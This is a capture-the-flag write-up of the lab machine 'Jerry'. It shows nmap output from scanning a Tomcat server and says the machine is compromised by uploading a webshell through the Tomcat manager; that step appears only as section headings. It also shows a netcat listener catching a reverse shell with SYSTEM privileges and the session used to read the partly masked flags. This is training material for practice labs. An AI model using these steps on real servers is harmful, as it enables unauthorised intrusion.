Jerry

Dec 31, 2020 TJNull's List Windows Tomcat
Share on:

Jerry

Introduction:

Jerry is a very easy machine where you can enumerate the tomcat webserver and upload a webshell to exploit the box.

Recon

 1 nmap -sS -sC -sV -T4 -O -oN nmap.jerry.txt 10.10.10.95
 2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 15:22 EST
 3Nmap scan report for 10.10.10.95
 4Host is up (0.013s latency).
 5Not shown: 999 filtered ports
 6PORT     STATE SERVICE VERSION
 78080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
 8|_http-favicon: Apache Tomcat
 9|_http-server-header: Apache-Coyote/1.1
10|_http-title: Apache Tomcat/7.0.88
11Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
12Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
13No exact OS matches for host (test conditions non-ideal).
14
15OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
16Nmap done: 1 IP address (1 host up) scanned in 17.91 seconds
17

Enumeration

Visit the webserver homepage

Jerry Home

Versions

Exploitation

Tomcat Applications

Reverse Shell setup

Reverse Shell Invocation

Reverse Shell Invocation

Post-exploit/PrivEsc

 1nc -lvnp 4444
 2listening on [any] 4444 ...
 3
 4who
 5connect to [10.10.14.25] from (UNKNOWN) [10.10.10.95] 49196
 6
 7
 8whoami
 9nt authority\system
10
11pwd
12
13Path                                                                           
14----                                                                           
15C:\apache-tomcat-7.0.88                                                        
16
17
18
19cd ..
20
21dir
22
23
24    Directory: C:\
25
26
27Mode                LastWriteTime     Length Name                              
28----                -------------     ------ ----                              
29d----          1/1/2021   6:20 AM            apache-tomcat-7.0.88              
30d----         8/22/2013   6:52 PM            PerfLogs                          
31d-r--         6/19/2018   6:42 PM            Program Files                     
32d----         6/19/2018   6:42 PM            Program Files (x86)               
33d-r--         6/18/2018  11:31 PM            Users                             
34d----          1/1/2021   6:20 AM            Windows                           
35
36
37
38cd Users
39
40dir
41
42
43    Directory: C:\Users
44
45
46Mode                LastWriteTime     Length Name                              
47----                -------------     ------ ----                              
48d----         6/18/2018  11:31 PM            Administrator                     
49d-r--         8/22/2013   6:39 PM            Public                            
50
51
52
53cd Administrator\Desktop
54
55dir
56
57
58    Directory: C:\Users\Administrator\Desktop
59
60
61Mode                LastWriteTime     Length Name                              
62----                -------------     ------ ----                              
63d----         6/19/2018   7:09 AM            flags                             
64
65
66
67cd flags
68
69dir
70
71
72    Directory: C:\Users\Administrator\Desktop\flags
73
74
75Mode                LastWriteTime     Length Name                              
76----                -------------     ------ ----                              
77-a---         6/19/2018   7:11 AM         88 2 for the price of 1.txt          
78
79
80
81
82
83type 2*
84user.txt
8570XXXXXXXXXXXXXXXXXXXXXX00
86
87root.txt
8804XXXXXXXXXXXXXXXXXXXXXe90e
89
90
91

Notes: